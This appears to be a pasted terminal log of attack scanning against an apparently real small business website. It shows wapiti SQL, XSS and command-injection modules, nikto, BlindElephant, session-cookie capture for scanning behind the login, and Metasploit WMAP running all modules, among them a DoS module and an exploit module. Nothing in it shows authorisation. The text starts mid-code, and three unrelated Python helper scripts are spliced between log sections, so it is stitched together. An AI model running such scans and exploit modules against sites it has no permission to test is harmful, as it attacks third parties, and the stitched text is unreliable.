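UDP open 192.168.1.1:53 ttl 64
"""

# Only the end-of-scan summary lines carry the service name; the immediate
# "TCP open ip:port ttl N" lines printed while the scan runs are skipped.
SUMMARY_RE = re.compile(r"^(TCP|UDP) open (\w+)\[\s*(\d+)\] from (\S+) ttl (\d+)$")

def parse_summary(text):
    """Return {ip: {(proto, port): (service, ttl)}} from the summary lines."""
    hosts = defaultdict(dict)
    for line in text.splitlines():
        m = SUMMARY_RE.match(line.strip())
        if m:
            proto, service, port, ip, ttl = m.groups()
            hosts[ip][(proto, int(port))] = (service, int(ttl))
    return dict(hosts)

def unexpected_exposure(hosts, allowed):
    """allowed maps an ip (or '*' for every host) to a set of (proto, port).
    Returns (ip, proto, port, service) for each listener not on the allowlist."""
    findings = []
    for ip, ports in sorted(hosts.items()):
        permitted = allowed.get("*", set()) | allowed.get(ip, set())
        for key in sorted(ports):
            if key not in permitted:
                findings.append((ip, key[0], key[1], ports[key][0]))
    return findings

def ttl_outliers(hosts):
    """Hosts whose reply TTL differs from the most common TTL in the result set;
    a different initial TTL usually means a different OS or a different path."""
    if not hosts:
        return {}
    ttls = {ip: next(iter(ports.values()))[1] for ip, ports in hosts.items()}
    common = Counter(ttls.values()).most_common(1)[0][0]
    return {ip: ttl for ip, ttl in ttls.items() if ttl != common}

if __name__ == "__main__":
    table = parse_summary(SAMPLE_OUTPUT)
    # Assumed baseline: only the web ports are meant to be reachable.
    for finding in unexpected_exposure(table, {"*": {("TCP", 80), ("TCP", 443)}}):
        print("unexpected listener: %s %s/%d (%s)" % finding)
    for ip, ttl in ttl_outliers(table).items():
        print("ttl outlier: %s replies with ttl %d" % (ip, ttl))
```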
  1202.  
  1203. CHECK THE SITE WITH WAPITI
  1204.  
  1205. ┌─[root@parrot]─[~]
  1206. └──╼ #wapiti http://www.vyxunbnbs.com/ -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report
  1207. Wapiti-2.3.0 (wapiti.sourceforge.net)
  1208.  
  1209. [*] Loading modules:
  1210. mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto
  1211.  
  1212. [+] Launching module exec
  1213. + attackGET http://www.vyxunbnbs.com/
  1214. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1215. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1216. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1217. + attackGET http://www.vyxunbnbs.com/home.html
  1218. + attackGET http://www.vyxunbnbs.com/contact.html
  1219. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1220. + attackGET http://www.vyxunbnbs.com/products.html
  1221. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1222. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1223. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1224. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1225. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1226. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1227. + attackGET http://www.vyxunbnbs.com/random-items.html
  1228. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1229. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1230. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1231. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1232. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1233. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1234. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1235. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1236. + attackGET http://www.vyxunbnbs.com/Loading...
  1237. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1238. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1239. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1240.  
  1241. [+] Launching module file
  1242. + attackGET http://www.vyxunbnbs.com/
  1243. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1244. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1245. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1246. + attackGET http://www.vyxunbnbs.com/home.html
  1247. + attackGET http://www.vyxunbnbs.com/contact.html
  1248. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1249. + attackGET http://www.vyxunbnbs.com/products.html
  1250. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1251. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1252. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1253. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1254. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1255. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1256. + attackGET http://www.vyxunbnbs.com/random-items.html
  1257. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1258. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1259. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1260. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1261. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1262. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1263. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1264. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1265. + attackGET http://www.vyxunbnbs.com/Loading...
  1266. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1267. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1268. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1269.  
  1270. [+] Launching module sql
  1271. + attackGET http://www.vyxunbnbs.com/
  1272. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1273. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1274. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1275. + attackGET http://www.vyxunbnbs.com/home.html
  1276. + attackGET http://www.vyxunbnbs.com/contact.html
  1277. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1278. + attackGET http://www.vyxunbnbs.com/products.html
  1279. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1280. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1281. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1282. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1283. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1284. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1285. + attackGET http://www.vyxunbnbs.com/random-items.html
  1286. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1287. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1288. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1289. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1290. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1291. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1292. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1293. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1294. + attackGET http://www.vyxunbnbs.com/Loading...
  1295. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1296. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1297. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1298.  
  1299. [+] Launching module xss
  1300. + attackGET http://www.vyxunbnbs.com/
  1301. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1302. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1303. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1304. + attackGET http://www.vyxunbnbs.com/home.html
  1305. + attackGET http://www.vyxunbnbs.com/contact.html
  1306. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1307. + attackGET http://www.vyxunbnbs.com/products.html
  1308. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1309. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1310. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1311. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1312. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1313. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1314. + attackGET http://www.vyxunbnbs.com/random-items.html
  1315. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1316. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1317. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1318. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1319. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1320. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1321. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1322. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1323. + attackGET http://www.vyxunbnbs.com/Loading...
  1324. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1325. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1326. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1327.  
  1328. [+] Launching module blindsql
  1329. + attackGET http://www.vyxunbnbs.com/
  1330. + attackGET http://www.vyxunbnbs.com/site.css?v=
  1331. + attackGET http://www.vyxunbnbs.com/common/wsb/core
  1332. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
  1333. + attackGET http://www.vyxunbnbs.com/home.html
  1334. + attackGET http://www.vyxunbnbs.com/contact.html
  1335. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1336. + attackGET http://www.vyxunbnbs.com/products.html
  1337. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
  1338. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1339. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
  1340. + attackGET http://www.vyxunbnbs.com/bone-art.html
  1341. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
  1342. + attackGET http://www.vyxunbnbs.com/wooden-items.html
  1343. + attackGET http://www.vyxunbnbs.com/random-items.html
  1344. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
  1345. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1346. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1347. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
  1348. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1349. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
  1350. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1351. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1352. + attackGET http://www.vyxunbnbs.com/Loading...
  1353. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1354. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
  1355. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1356.  
  1357. [+] Launching module permanentxss
  1358. + http://www.vyxunbnbs.com/
  1359. + http://www.vyxunbnbs.com/site.css?v=
  1360. + http://www.vyxunbnbs.com/common/wsb/core
  1361. + http://www.vyxunbnbs.com/libs/knockout/knockout
  1362. + http://www.vyxunbnbs.com/home.html
  1363. + http://www.vyxunbnbs.com/contact.html
  1364. + http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
  1365. + http://www.vyxunbnbs.com/products.html
  1366. + http://www.vyxunbnbs.com/bullet-jewellery.html
  1367. + http://www.vyxunbnbs.com/boar-tusk-necklaces.html
  1368. + http://www.vyxunbnbs.com/decorated-skulls-.html
  1369. + http://www.vyxunbnbs.com/bone-art.html
  1370. + http://www.vyxunbnbs.com/leather-crafting.html
  1371. + http://www.vyxunbnbs.com/wooden-items.html
  1372. + http://www.vyxunbnbs.com/random-items.html
  1373. + http://www.vyxunbnbs.com/WSB.ForceDesktop
  1374. + http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
  1375. + http://www.vyxunbnbs.com/designer/iebackground/iebackground
  1376. + http://www.vyxunbnbs.com/.view-as-mobile
  1377. + http://www.vyxunbnbs.com/.wsb-canvas-page-container
  1378. + http://www.vyxunbnbs.com/vyxunbnbs.com
  1379. + http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
  1380. + http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
  1381. + http://www.vyxunbnbs.com/Loading...
  1382. + http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
  1383. + http://www.vyxunbnbs.com/plugins/twitter/index.php
  1384. + http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
  1385.  
  1386. Report
  1387. ------
  1388. A report has been generated in the file /tmp/scan_report
  1389. Open /tmp/scan_report/index.html with a browser to see this report.
  1390.  
  1391. ┌─[root@parrot]─[~]
  1392. └──╼ #firefox /tmp/scan_report/index.html
  1393.  
  1394.  
  1395. ...........................
  1396. Note
  1397. ========
  1398. This scan has been saved in the file /root/.wapiti/scans/www.vyxunbnbs.com.xml
  1399. You can use it to perform attacks without scanning again the web site with the "-k" parameter
  1400.  
  1401.  
  1402. NOTE
  1403.  
  1404. wapiti works better when you give it the session cookie value, so the scan also covers pages behind the login.
  1405.  
  1406. To get the cookie, use the getcookie.py script:
  1407.  
  1408. Usage: python getcookie.py <cookie_file> <url_with_form>
  1409.  
  1410. It logs in through the form and dumps the resulting cookie to the file. After getting the cookie, point the scanner at it (wapiti takes it with --cookie; Powerfuzzer via the Cookie button in its GUI).
  1411.  
  1412. Cookies are saved in LWP format (LWPCookieJar):
  1415.  
  1416. #LWP-Cookies-2.0
  1417. Set-Cookie3: SID=a0b498e88f488dd8a48baf6778da85b9; path="/"; domain="test.com"; path_spec; discard; version=0
  1418.  
  1419.  
  1420. ┌─[✗]─[root@parrot]─[/usr/share/powerfuzzer]
  1421. └──╼ #./getcookie.py ~/cookie.txt http://www.vyxunbnbs.com/webapp/login.php
  1422.  
  1423. Enter username/password etc as required to complete the login form
  1424.  
  1425. Script exits; check the contents of ~/cookie.txt, it will look something like:
  1426.  
  1427. #LWP-Cookies-2.0
  1428.  
  1429. Set-Cookie3: PHPSESSID=3d20841af5de43c718732d80e5d78fe3; path="/"; domain="orange"; path_spec; expires="2010-01-04 22:42:47Z"; version=0
  1430.  
  1431. Now we can use wapiti to test any URLs 'behind' the login screen:
  1432.  
  1433. wapiti http://www.vyxunbnbs.com/webapp/search.php --cookie ~/cookie.txt -v 2 -o ~/report -x http://www.vyxunbnbs.com/webapp/logout.php
  1434.  
  1435. (We need to exclude the logout page with -x, else our session will get destroyed when wapiti spiders that page.)
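As an added example (not part of the original paste or of wapiti/getcookie.py), this Python script shows what the scanner does with the LWP file: it loads the cookie with the standard library's LWPCookieJar, computes the Cookie header for each URL, and drops the logout URL the way -x does. The cookie file content is constructed from the sample above, and test.com / other.example are placeholder hosts.

```python
import os
import tempfile
import urllib.request
from http.cookiejar import LWPCookieJar

# Constructed sample in the LWP format getcookie.py writes (not a real session).
SAMPLE_LWP = """#LWP-Cookies-2.0
Set-Cookie3: SID=a0b498e88f488dd8a48baf6778da85b9; path="/"; domain="test.com"; path_spec; discard; version=0
"""


def load_lwp_cookies(path):
    """Load an LWP cookie file such as the one getcookie.py produces.

    Session cookies carry the 'discard' attribute (no expiry), so a plain
    load() would silently drop them; ignore_discard keeps them.
    """
    jar = LWPCookieJar(path)
    jar.load(ignore_discard=True, ignore_expires=True)
    return jar


def cookie_header_for(jar, url):
    """Return the Cookie header the jar would attach to a request for url,
    or None when no stored cookie matches the URL's domain and path."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


def is_excluded(url, excluded):
    """Mirror wapiti's -x: skip URLs that would end the session (logout)."""
    return any(url.startswith(e) for e in excluded)


def plan_authenticated_scan(cookie_path, urls, excluded):
    """Return [(url, cookie_header)] for the URLs a session-aware scan would
    request: excluded URLs are dropped, URLs the cookie does not cover get None."""
    jar = load_lwp_cookies(cookie_path)
    plan = []
    for url in urls:
        if is_excluded(url, excluded):
            continue
        plan.append((url, cookie_header_for(jar, url)))
    return plan


def demo():
    """Write the constructed cookie file to a temp dir and plan a small scan."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "cookie.txt")
        with open(path, "w") as fh:
            fh.write(SAMPLE_LWP)
        urls = [
            "http://test.com/webapp/search.php",      # covered by the cookie
            "http://test.com/webapp/logout.php",      # excluded, would kill the session
            "http://other.example/webapp/search.php", # different host, no cookie sent
        ]
        return plan_authenticated_scan(path, urls, ["http://test.com/webapp/logout.php"])


if __name__ == "__main__":
    for url, header in demo():
        print(url, "->", header)
```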
  1436.  
  1437.  
  1438. USE BLINDELEPHANT
  1439.  
  1440. https://media.blackhat.com/bh-us-10/presentations/Thomas/BlackHat-USA-2010-Thomas-BlindElephant-WebApp-Fingerprinting-slides.pdf
  1441.  
  1442. BlindElephant.py http://www.somesite.com appName
  1443.  
  1444. BlindElephant.py http://forum.somesite.com phpbb
  1445.  
  1446. ┌─[root@parrot]─[~]
  1447. └──╼ #BlindElephant.py www.vyxunbnbs.com movabletype
  1448. Loaded /usr/lib/pymodules/python2.7/blindelephant/dbs/movabletype.pkl with 101 versions, 2229 differentiating paths, and 216 version groups.
  1449. Starting BlindElephant fingerprint for version of movabletype at http://www.vyxunbnbs.com
  1450.  
  1451. Hit http://www.vyxunbnbs.com/mt-static/mt.js
  1452. File produced no match. Error: Failed to reach a server: timed out
  1453.  
  1454. Hit http://www.vyxunbnbs.com/mt-static/js/tc/client.js
  1455. File produced no match. Error: Failed to reach a server: timed out
  1456.  
  1457.  
  1458. Error: All versions ruled out!
  1459.  
  1460.  
  1461.  
  1462. CHECK THE SITE WITH NIKTO
  1463.  
  1464. ┌─[root@parrot]─[~]
  1465. └──╼ #nikto -h 198.71.232.3
  1466. - Nikto v2.1.6
  1467. ---------------------------------------------------------------------------
  1468. + No web server found on 198.71.232.3:80
  1469. ---------------------------------------------------------------------------
  1470. + 0 host(s) tested
  1471.  
  1472. ┌─[root@parrot]─[~]
  1473. └──╼ #nikto -h 198.71.232.3 -p 443
  1474. - Nikto v2.1.6
  1475. ---------------------------------------------------------------------------
  1476. + Target IP: 198.71.232.3
  1477. + Target Hostname: 198.71.232.3
  1478. + Target Port: 443
  1479. ---------------------------------------------------------------------------
  1480. + SSL Info: Subject: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, LLC/CN=*.godaddysites.com
  1481. Ciphers: ECDHE-RSA-AES256-GCM-SHA384
  1482. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
  1483. + Start Time: 2016-05-29 17:25:53 (GMT2)
  1484. ---------------------------------------------------------------------------
  1485. + Server: DPS/1.0.3
  1486. + Cookie dps_site_id created without the secure flag
  1487. + Cookie dps_site_id created without the httponly flag
  1488. + The anti-clickjacking X-Frame-Options header is not present.
  1489. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1490. + Uncommon header 'x-siteid' found, with contents: 2000
  1491. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  1492. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1493. + No CGI Directories found (use '-C all' to force check all possible dirs)
  1494. + Server is using a wildcard certificate: *.godaddysites.com
  1495. + Hostname '198.71.232.3' does not match certificate's names: *.godaddysites.com
  1496. + ERROR: Error limit (20) reached for host, giving up. Last error:
  1497. + Scan terminated: 18 error(s) and 9 item(s) reported on remote host
  1498. + End Time: 2016-05-29 18:04:21 (GMT2) (2308 seconds)
  1499. ---------------------------------------------------------------------------
  1500. + 1 host(s) tested
  1501.  
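The nikto findings above are all response-header hygiene issues, so they can be re-checked (and regression-tested after a fix) without nikto. The following is an added example, not code from the paste or from nikto: it audits a constructed set of response headers modelled on the scan output (Server banner and cookie name from the scan, cookie value made up) and a hardened variant that should produce no findings.

```python
# Constructed response headers approximating what nikto saw on port 443.
WEAK_RESPONSE = [
    ("Server", "DPS/1.0.3"),
    ("Content-Type", "text/html"),
    ("x-siteid", "2000"),
    ("Set-Cookie", "dps_site_id=2000; path=/"),
]

# Same site with the headers nikto asked for (values are the usual safe defaults).
HARDENED_RESPONSE = [
    ("Server", "webserver"),
    ("Content-Type", "text/html; charset=utf-8"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("X-Frame-Options", "DENY"),
    ("X-Content-Type-Options", "nosniff"),
    ("X-XSS-Protection", "1; mode=block"),
    ("Set-Cookie", "dps_site_id=2000; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

# Headers nikto reported as missing, with findings phrased like its output.
REQUIRED_HEADERS = {
    "x-frame-options": "anti-clickjacking X-Frame-Options header is not present",
    "x-content-type-options": "X-Content-Type-Options header is not set",
    "x-xss-protection": "X-XSS-Protection header is not defined",
}


def parse_set_cookie(value):
    """Return (name, {attribute: value}) for one Set-Cookie header.

    Attribute names are lowercased; flag attributes (Secure, HttpOnly) map to "".
    """
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_headers(headers, over_tls):
    """Audit a list of (name, value) response headers; return nikto-style findings.

    over_tls selects the checks that only matter on HTTPS (HSTS, Secure cookies).
    """
    present = {k.lower(): v for k, v in headers}
    findings = []
    for name, msg in REQUIRED_HEADERS.items():
        if name not in present:
            findings.append(msg)
    if over_tls and "strict-transport-security" not in present:
        findings.append("site uses SSL and the Strict-Transport-Security header is not defined")
    server = present.get("server", "")
    if any(ch.isdigit() for ch in server):
        findings.append("Server header leaks a version: %s" % server)
    for key, val in headers:
        if key.lower() != "set-cookie":
            continue
        cname, attrs = parse_set_cookie(val)
        if over_tls and "secure" not in attrs:
            findings.append("Cookie %s created without the secure flag" % cname)
        if "httponly" not in attrs:
            findings.append("Cookie %s created without the httponly flag" % cname)
    return findings


if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label)
        for finding in audit_headers(hdrs, over_tls=True):
            print("  +", finding)
```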
  1502.  
  1503. USE METASPLOIT
  1504.  
  1505. ____ _ ____
  1506. | _ \ __ _ _ __ _ __ ___ | |_/ ___| ___ ___
  1507. | |_) / _` | '__| '__/ _ \| __\___ \ / _ \/ __|
  1508. | __/ (_| | | | | | (_) | |_ ___) | __/ (__
  1509. |_| \__,_|_| |_| \___/ \__|____/ \___|\___|
  1510.  
  1511.  
  1512. executing "msfstart"
  1513.  
  1514. Creating database user 'msf'
  1515. Enter password for new role:
  1516. Enter it again:
  1517. Creating databases 'msf' and 'msf_test'
  1518. Creating configuration file in /usr/share/metasploit-framework/config/database.yml
  1519. Creating initial database schema
  1520. ┌─[root@parrot]─[~]
  1521. └──╼ #msfconsole
  1522.  
  1523. Call trans opt: received. 2-19-98 13:24:18 REC:Loc
  1524.  
  1525. Trace program: running
  1526.  
  1527. wake up, Neo...
  1528. the matrix has you
  1529. follow the white rabbit.
  1530.  
  1531. knock, knock, Neo.
  1532.  
  1533. (`. ,-,
  1534. ` `. ,;' /
  1535. `. ,'/ .'
  1536. `. X /.'
  1537. .-;--''--.._` ` (
  1538. .' / `
  1539. , ` ' Q '
  1540. , , `._ \
  1541. ,.| ' `-.;_'
  1542. : . ` ; ` ` --,.._;
  1543. ' ` , ) .'
  1544. `._ , ' /_
  1545. ; ,''-,;' ``-
  1546. ``-..__``--`
  1547.  
  1548.  
  1549. http://metasploit.pro
  1550.  
  1551.  
  1552. Easy phishing: Set up email templates, landing pages and listeners
  1553. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
  1554.  
  1555. =[ metasploit v4.11.5-2016010401 ]
  1556. + -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
  1557. + -- --=[ 437 payloads - 37 encoders - 8 nops ]
  1558. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1559.  
  1560. msf >
  1561.  
  1562.  
  1563. CONNECT TO THE POSTGRES DB
  1564.  
  1565. msf > db_connect root:toor
  1566. [-] postgresql already connected to msf
  1567. [-] Run db_disconnect first if you wish to connect to a different database
  1568. msf >
  1569.  
  1570.  
  1571. CHECK DB STATUS
  1572.  
  1573. msf > db_status
  1574. [*] postgresql connected to msf
  1575.  
  1576.  
  1577. USE WMAP
  1578.  
  1579. msf > load wmap
  1580.  
  1581. .-.-.-..-.-.-..---..---.
  1582. | | | || | | || | || |-'
  1583. `-----'`-'-'-'`-^-'`-'
  1584. [WMAP 1.5.1] === et [ ] metasploit.com 2012
  1585. [*] Successfully loaded plugin: wmap
  1586. msf >
  1587.  
  1588. ADD THE SITE
  1589.  
  1590. msf > wmap_sites -a http://www.vyxunbnbs.com
  1591.  
  1592. msf > wmap_sites -l
  1593.  
  1594. ADD THE TARGET
  1595.  
  1596. msf > wmap_targets -t http://198.71.232.3
  1597. msf > wmap_targets -l
  1598. [*] Defined targets
  1599. ===============
  1600.  
  1601. Id Vhost Host Port SSL Path
  1602. -- ----- ---- ---- --- ----
  1603. 0 198.71.232.3 198.71.232.3 80 false /
  1604.  
  1605.  
  1606. LIST THE ENABLED WMAP MODULES (wmap_run -t only shows them, it does not run them)
  1607.  
  1608. msf > wmap_run -t
  1609. [*] Testing target:
  1610. [*] Site: 198.71.232.3 (198.71.232.3)
  1611. [*] Port: 80 SSL: false
  1612. ============================================================
  1613. [*] Testing started. 2016-05-29 13:37:42 +0200
  1614. [*] Loading wmap modules...
  1615. [*] 40 wmap enabled modules loaded.
  1616. [*]
  1617. =[ SSL testing ]=
  1618. ============================================================
  1619. [*] Target is not SSL. SSL modules disabled.
  1620. [*]
  1621. =[ Web Server testing ]=
  1622. ============================================================
  1623. [*] Module auxiliary/scanner/http/http_version
  1624. [*] Module auxiliary/scanner/http/open_proxy
  1625. [*] Module auxiliary/scanner/http/robots_txt
  1626. [*] Module auxiliary/scanner/http/frontpage_login
  1627. [*] Module auxiliary/scanner/http/host_header_injection
  1628. [*] Module auxiliary/admin/http/tomcat_administration
  1629. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  1630. [*] Module auxiliary/scanner/http/options
  1631. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  1632. [*] Module auxiliary/scanner/http/scraper
  1633. [*] Module auxiliary/scanner/http/svn_scanner
  1634. [*] Module auxiliary/scanner/http/trace
  1635. [*] Module auxiliary/scanner/http/vhost_scanner
  1636. [*] Module auxiliary/scanner/http/webdav_internal_ip
  1637. [*] Module auxiliary/scanner/http/webdav_scanner
  1638. [*] Module auxiliary/scanner/http/webdav_website_content
  1639. [*]
  1640. =[ File/Dir testing ]=
  1641. ============================================================
  1642. [*] Module auxiliary/dos/http/apache_range_dos
  1643. [*] Module auxiliary/scanner/http/backup_file
  1644. [*] Module auxiliary/scanner/http/brute_dirs
  1645. [*] Module auxiliary/scanner/http/copy_of_file
  1646. [*] Module auxiliary/scanner/http/dir_listing
  1647. [*] Module auxiliary/scanner/http/dir_scanner
  1648. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  1649. [*] Module auxiliary/scanner/http/file_same_name_dir
  1650. [*] Module auxiliary/scanner/http/files_dir
  1651. [*] Module auxiliary/scanner/http/http_put
  1652. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  1653. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  1654. [*] Module auxiliary/scanner/http/replace_ext
  1655. [*] Module auxiliary/scanner/http/soap_xml
  1656. [*] Module auxiliary/scanner/http/trace_axd
  1657. [*] Module auxiliary/scanner/http/verb_auth_bypass
  1658. [*]
  1659. =[ Unique Query testing ]=
  1660. ============================================================
  1661. [*] Module auxiliary/scanner/http/blind_sql_query
  1662. [*] Module auxiliary/scanner/http/error_sql_injection
  1663. [*] Module auxiliary/scanner/http/http_traversal
  1664. [*] Module auxiliary/scanner/http/rails_mass_assignment
  1665. [*] Module exploit/multi/http/lcms_php_exec
  1666. [*]
  1667. =[ Query testing ]=
  1668. ============================================================
  1669. [*]
  1670. =[ General testing ]=
  1671. ============================================================
  1672. [*] Done.
  1673.  
  1674. All that remains now is to actually run the WMAP scan against our target URL.
  1675.  
  1676. RUN THE WMAP MODULES AGAINST THE TARGET (wmap_run -e)
  1677.  
  1678. msf > wmap_run -e
  1679. [*] Using ALL wmap enabled modules.
  1680. [-] NO WMAP NODES DEFINED. Executing local modules
  1681. [*] Testing target:
  1682. [*] Site: 198.71.232.3 (198.71.232.3)
  1683. [*] Port: 80 SSL: false
  1684. ============================================================
  1685. [*] Testing started. 2016-05-29 13:38:10 +0200
